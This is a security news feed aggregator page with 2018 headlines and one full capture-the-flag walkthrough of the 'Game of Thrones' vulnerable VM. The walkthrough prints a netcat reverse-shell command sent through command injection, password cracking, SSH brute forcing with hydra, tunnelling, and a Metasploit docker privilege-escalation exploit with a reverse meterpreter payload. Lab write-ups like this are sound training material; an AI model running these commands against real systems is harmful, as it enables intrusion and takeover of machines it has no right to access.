Feed aggregator

Week in review: Vulnerability tracking, GDPR quick guide, tackling the insider threat

News from 'Help Net Security' - Mon, 19/Feb/2018 - 08:26
Here’s an overview of some of last week’s most interesting news and articles: Intel offers to pay for Spectre-like side channel vulnerabilities Intel is expanding the bug bounty program it started last March, and is raising considerably the awards it plans to give out for helpful vulnerability information. The company is, simultaneously, starting a new bug bounty program focused specifically on side channel vulnerabilities, i.e., vulnerabilities that are rooted in Intel hardware but can be … More →
Categories: Cyber India

Learn Ethical Hacking Online — 9 Courses At Lowest Price Ever

News from 'The Hackers News' - Sun, 18/Feb/2018 - 00:24
How to become a Professional Hacker? This is one of the most frequently asked queries we came across on a daily basis. Do you also want to learn real-world hacking techniques but don’t know where to start? This week's THN deal is for you. Today THN Deal Store has announced a new Super-Sized Ethical Hacking Bundle that let you get started your career in hacking and penetration testing
Categories: Cyber India

Dell EMC plugs critical bugs in VMAX enterprise storage offerings

News from 'Help Net Security' - Sat, 17/Feb/2018 - 00:02
Dell EMC has patched two critical flaws in vApp Manager, the management interface for its VMAX enterprise storage systems, and is urging all customers to implement fixes as soon as possible. About the VMAX enterprise storage vulnerabilities The flaws were discovered and reported by Tenable’s director of reverse engineering Carlos Perez. The graver of the two is CVE-2018-1216, which marks the existence of a hard-coded password vulnerability. “The vApp Manager contains an undocumented default account … More →
Categories: Cyber India

Cleveland-Chicago Hyperloop Line Gets Feasibility Study

News from 'TechNewsWorld' - Fri, 16/Feb/2018 - 22:56
HTT has announced an agreement with an Ohio agency to launch a study on creating its first interstate hyperloop project in the U.S., connecting Chicago and Cleveland. The agreement with the Northern Ohio Area Coordinating Committee puts in motion a regional feasibility study, to be carried out in conjunction with the Illinois Department of Transportation. Various routes have been identified for the hyperloop service, which would operate a super high-speed system to accommodate transport at more than 700 miles per hour.
Categories: Cyber India

Scanned IDs of 119,000 FedEx customers exposed online

News from 'Help Net Security' - Fri, 16/Feb/2018 - 21:43
An unsecured Amazon Web Services bucket holding personal information and scans of IDs of some 119,000 US and international citizens has been found sitting online by Kromtech security researchers earlier this month. The stored data had been stockpiled by Bongo International, a company that specialized in helping North American retailers and brands sell online to consumers in other countries. Bongo was acquired by FedEx in 2014, relaunched as FedEx Cross-Border International, and ultimately shuttered in … More →
Categories: Cyber India

GDPR quick guide: Why non-compliance could cost you big

News from 'Help Net Security' - Fri, 16/Feb/2018 - 19:30
If you conduct business in the EU, offer goods or services to, or monitor the online behavior of EU citizens, then the clock is ticking. You only have a few more months – until May – to make sure your organization complies with GDPR data privacy regulations. Failure to abide by GDPR means you could get hit with huge fines. Finding and investigating data breaches: Why it’s always too little, too late Personal data protection … More →
Categories: Cyber India

New infosec products of the week​: February 16, 2018

News from 'Help Net Security' - Fri, 16/Feb/2018 - 19:00
ScramFS: Encryption system for safeguarding cloud data Scram Software has announced that ScramFS – an internationally peer-reviewed encryption system for safeguarding cloud data – is now available globally to SMEs, government and not-for-profit organizations, enabling encryption of sensitive data to reduce breaches and assist in ensuring legal, HIPPA and GDPR compliance. Dtex Systems updates its Advanced User Behavior Intelligence Platform Dtex Systems announced innovations to its Advanced User Behavior Intelligence Platform, designed to meet the … More →
Categories: Cyber India

Intel offers to pay for Spectre-like side channel vulnerabilities

News from 'Help Net Security' - Fri, 16/Feb/2018 - 18:30
Intel is expanding the bug bounty program it started last March, and is raising considerably the awards it plans to give out for helpful vulnerability information. Where information about critical vulnerabilities in Intel software, firmware and hardware could have previously been rewarded with up to $7,500, $10,000 and $30,000, respectively, now the bounties in those same categories go up to $10,000, $30,000 and $100,000. A new bug bounty program for side channel vulnerabilities The company … More →
Categories: Cyber India

Still relying solely on CVE and NVD for vulnerability tracking? Bad idea

News from 'Help Net Security' - Fri, 16/Feb/2018 - 18:00
2017 broke the previous all-time record for the highest number of reported vulnerabilities. The 20,832 vulnerabilities cataloged during 2017 by Risk Based Security (VulnDB) eclipsed the total covered by MITRE’s Common Vulnerability Enumeration (CVE) and the National Vulnerability Database (NVD) by more than 7,900. “Incredibly, we see too many companies still relying on CVE and NVD for vulnerability tracking, despite the US government funded organization falling short year after year. While some argue that the … More →
Categories: Cyber India

A Single-Character Message Can Crash Any Apple iPhone, iPad Or Mac

News from 'The Hackers News' - Fri, 16/Feb/2018 - 12:32
Only a single character can crash your iPhone and block access to the Messaging app in iOS as well as popular apps like WhatsApp, Facebook Messenger, Outlook for iOS, and Gmail. First spotted by Italian Blog Mobile World, a potentially new severe bug affects not only iPhones but also a wide range of Apple devices, including iPads, Macs and even Watch OS devices running the latest versions of
Categories: Cyber India

Apple's HomePod Could Leave a Lasting Mark With Customers

News from 'TechNewsWorld' - Fri, 16/Feb/2018 - 03:47
Apple's new $350 HomePod could make an impact in several ways. In addition to providing listeners with highly praised sound quality, the smart speaker literally could make an impression on some of the wood surfaces it touches -- in the form of white rings. The HomePod, which is compatible only with other Apple products, can stream music to those who have an Apple Music subscription. It has a few other capabilities too -- including the dubious ability to mar certain types of wood surfaces.
Categories: Cyber India

UK government officially blames Russia for NotPetya attack

News from 'Help Net Security' - Fri, 16/Feb/2018 - 01:52
The UK government has officially attributed the June 2017 NotPetya cyber attack to the Russian government. The statement is backed by an assessment of the UK’s National Cyber Security Centre, which has found that the Russian military was “almost certainly” responsible for it. The NotPetya attack “The NotPetya attack saw a malicious data encryption tool inserted into a legitimate a piece of software used by most of Ukraine’s financial and government institutions,” the NCSC noted. … More →
Categories: Cyber India

Are Smart TV Designs Taking Home Security for Granted?

News from 'TechNewsWorld' - Fri, 16/Feb/2018 - 00:24
Millions of smart TVs from Samsung and some streaming devices from Roku recently were found to be vulnerable to cyberattacks, allowing intruders to take control and remotely change channels and volume settings, among other things, according to Consumer Reports research. Vulnerabilities were discovered not only in Samsung televisions, but also in TVs from TCL and other brands that sell sets compatible with the Roku TV smart-TV platform and streaming video devices such as Roku Ultra, according to the report.
Categories: Cyber India

IoT botnet bypasses firewalls to get to ZyXEL modems

News from 'Help Net Security' - Thu, 15/Feb/2018 - 21:06
NewSky Security’s honeypots have detected a new IoT botnet in the making. The botnet was named DoubleDoor, as it leverages two distinct backdoors to get to the target: ZyXEL PK5001Z modems. The DoubleDoor attacks What’s interesting about this particular botnet is that it’s ready to pass an extra layer of security to get to the modem: Juniper Networks’ NetScreen hardware firewall devices. To pull off the attack, it employs exploits for two vulnerabilities: CVE-2015–7755, which … More →
Categories: Cyber India

7 steps security leaders can take to deal with Spectre and Meltdown

News from 'Help Net Security' - Thu, 15/Feb/2018 - 20:51
Security and risk management leaders must take a pragmatic and risk-based approach to the ongoing threats posed by an entirely new class of vulnerabilities, according to Gartner. Spectre and Meltdown are the code names given to different strains of a new class of attacks that target an underlying exploitable design implementation inside the majority of computer chips manufactured over the last 20 years. Security researchers revealed three major variants of attacks in January 2018. The … More →
Categories: Cyber India

Why do we need a risk-based approach to authentication?

News from 'Help Net Security' - Thu, 15/Feb/2018 - 19:00
20 years ago, everyone worked at a desktop workstation hardwired into an office building. This made network security simple and organizations felt they could depend on the time-tested method of the trusted perimeter. Firewalls were relied on to keep out external threats, and anything within the network was considered secure and safe. Today, however, the number of variables has skyrocketed. The move to the cloud, BYOD, and increased use of outside contractors means a legitimate … More →
Categories: Cyber India

A five-year analysis of reported Windows vulnerabilities

News from 'Help Net Security' - Thu, 15/Feb/2018 - 18:30
Based on analysis of all disclosed Microsoft vulnerabilities in 2017, a new Avecto report shows a significant rise in the number of reported vulnerabilities. Last year, 685 vulnerabilities were found versus 325 vulnerabilities that were found in 2013. The removal of admin rights could mitigate 80% of all critical Microsoft vulnerabilities reported in 2017. Nearly all (95%) of critical vulnerabilities in Microsoft browsers could be mitigated by the removal of admin rights. The rise of … More →
Categories: Cyber India

SentinelOne Debuts Unified OS Threat Protection

News from 'TechNewsWorld' - Thu, 15/Feb/2018 - 18:30
SentinelOne this week announced a partnership with Microsoft to bolster threat protection for mixed platform users, making computing safer for Linux machines in a multiplatform workplace. SentinelOne will integrate its Endpoint Protection Platform with Microsoft's Windows Defender Advanced Threat Protection service to cover Mac and Linux device platforms. SentinelOne's EPP technology will feed all threats and detections from Mac and Linux endpoints seamlessly into the Windows Defender ATP console.
Categories: Cyber India

Cryptomining malware continues to drain enterprise CPU power

News from 'Help Net Security' - Thu, 15/Feb/2018 - 18:00
Cryptomining malware continues to impact organizations globally as 23% were affected by the Coinhive variant during January 2018, according to Check Point’s latest Global Threat Impact Index. Researchers discovered three different variants of cryptomining malware in its Top 10 most prevalent ranking, with Coinhive ranking first, impacting more than one-in-five organizations. Coinhive performs online mining of Monero cryptocurrency when a user visits a web page without the user’s approval. The implanted JavaScript then uses the … More →
Categories: Cyber India

Hack the Game of Thrones VM (CTF Challenge)

News from 'Hacking Articles' - Thu, 15/Feb/2018 - 16:04

Hello friends! Today we are going to take another CTF challenge known as Game of Thrones. The credit for making this vm machine goes to “OscarAkaElvis” and it is another capture the flag challenge in which our goal is to get all the flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.133 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -p- -sV 192.168.1.133

We find that port 80 is running http, so we open the ip in our browser.

We take a look at the source code and find the flag syntax.

Use dirb to enumerate the ports.

dirb http://192.168.1.133

We find the robots.txt file, we open it and find few directories.

We open the directory /secret-island/ using user-agent Three-eyed-raven

We open it and find a link to a map.

When we open the map we find the location of all the flags.

We open the directory called /direct-access-to-kings-landing/ using user-agent Three-eyed-raven.

We open the directory and take a look at the source code and find what looks like port for port knocking and to user as oberynmartell.

We then find /h/i/d/d/e/n/ directory using dirb and we open it.

We take a look at the source code and find password for oberynmartell.

We use ftp to connect we use the username and password we previously found to login. We get the first flag as soon we login.

We find two files and download through ftp and find a file that gives us the type of hash it uses.

We save the hash in a file.

Now we use john the ripper to decrypt the file and find the password to be stark

John –format=dynamic_2008 hash.txt

Now we use mcrypt to decrypt the encrypted file we found in the ftp server.

mcrypt -d the_wall.txt.nc

We now add the domain winterfell.7kingdoms.ctf to /etc/hosts and open the link found in the file.

We login using the username and password to login, and find a page with two images.

We take a look at the source code, and we find the second flag.

Along with the second flag we also find a hint that it contains something, so we download the file and use strings to take a look inside the file and find a domain name.

strings stark_shield.jpg

It hints us that TXT record will contain something useful so we use nslookup to check the TXT records.  We had to make some changes to the domain name to make it valid, and we find our 3rd flag.

nslookup -q=txt Timef0rconqu3rs.7Kingdoms.ctf 192.168.1.133

Now we add the new domain name to /etc/hosts and open the link found in TXT record above.

We use login the username and password we find in the TXT records.

We use the search provided by the site to check for vulnerabilities.

We use the file manager module and it opened a file manager that lets us access few files.

In /home/aryastark folder we find a file called flag.txt

We download the file and open it in our system and find our 4th flag.

Now we got a hint to access a database now we know the server is running postgresql, we connect to it using the username password available in the file we find earlier.

psql –h 192.168.1.133 –u robinarryn –d mountainandthevale

We find a table called flag, we open it and find a base64 encoded string.

We decode the base64 encode string and find our 5th flag.

Now we check the other tables to check if we miss anything. In one of the tables we find a few names

Select * from arya_kill_list

In arya_kill_list we find these names that seems useful.

Searching through the database we find a rot16 encoded string.

We now convert the rot16 encoded flag and find a name of database along with the password. It also gives us a hint to use the username we find in the table above.

After enumerating the username we find that TheRedWomanMelisandre is the username.

Now we check the the table and find a secret flag.

Now we know kingdom of reach is in imap as it was shown in the map, now we use the number we find earlier to port knock.

knock 192.168.1.133 3487 64535 12345

Now we do a nmap scan to check if any new port opened on the server, we find that port 143 that is running imap opened.

nmap -p- 192.168.1.133

We use netcat to connect to it, we use the username and password we find in the hint earlier.

nc 192.168.1.133 143

In the inbox we find our 6th flag, we also get a hint to use port 1337 and a username and password is given to login.

We login into the site and find that it is git site.

After enumerating through the files we find that this site is vulnerable to command injection and a hint to use mysql.

We use netcat to get reverse shell on the site we use “”`code` to execute our code.

nc –e /bin/bash 192.168.1.116 1234

Now we setup our listener using netcat as soon as we execute our command we get a reverse shell.

nc -lvp 1234

On the webpage earlier we find hex encoded string when we decode it we get a location of a file:/home/tyrionlannister/checkpoint.txt, so we open it and find username, password and name of the database we need to look for.

Now we use the information above to find the tables available in the database.

We find the name of the table, it is called iron_throne, we take a look inside the table.

Now we find a morse code when we decode it we find it converts to /etc/mysql/flag, when we try to access it gives that file not found, earlier we find a hint that states we don’t have enough privileges so we try to take a look at our privileges.

We find that we can import files into the database. So first we create a table named Flag.

Now we import the file into our table.

Now when we access it we find our 7th flag. We also get username and password for ssh login.

Now we use this to login through ssh.

ssh daenerystargaryen@192.168.1.133

Enumerating through the system we find two files called digger.txt and checkpoint.txt, checkpoint.txt contains a hint to login through ssh at ip 172.25.0.2 and use the file digger.txt to login through ssh.

We download digger.txt to our system through ssh.

scp digger.txt root@192.168.1.116:

We use local tunnelling to bind it to our port 2222.

ssh daenerystargaryen@192.168.1.133 –L 2222:172.25.0.2:22 –N

Now we use hydra to login through ssh to using username as root and use digger.txt file to brute force.

We find that for the username root we have password “Dr4g0nGl4ss!”

We use this to login through ssh, we use localhost to connect as we have done ssh local tunnel to connect to trough ssh.

Now we enumerating through the files we find our secret flag. We also get a username and password to login through ssh.

We use metasploit to connect through ssh using this username and password.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.1.133

msf auxiliary(scanner/ssh/ssh_login) > set username branstark

msf auxiliary(scanner/ssh/ssh_login) > set  password Th3_Thr33_Ey3d_Raven

msf auxiliary(scanner/ssh/ssh_login) > run

After searching for some obvious possibilities to escalate privileges such as executables with the setuid bit set or exploits for the kernel, we noticed that this server is docker based. So we use the docker privilege escalation in metasploit.

msf > use exploit/linux/local/docker_daemon_privilege_escalation

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set lhost 192.168.1.116

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set payload linux/x86/meterpreter/reverse_tcp

msf exploit(linux/local/docker_daemon_privilege_escalation) >  set session 1

msf exploit(linux/local/docker_daemon_privilege_escalation) >  run

Now we get our escalated session, we now check and find that we are root.

Now we enumerate through the files and find password protected zip file called final_battle and a file that tells us how to find the password. It contains a pseudo code that tells us how to create the password using secret flags we found.

Now we have obtained 2 secret flag, searching through the files we find that music file contain a secret flag. In the home page we find 2 music file we use exiftool and find that the mp3 file contains the secret flag.

exiftool  game_of_thrones.mp3

Now we create a code using the pseudocode as reference in python.

We run the program and find the password.

We use zip to extract the file and use this password.

7z e final_battle

We find that a file called flag.txt was extracted, we open the file and find our final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Game of Thrones VM (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India
Syndicate content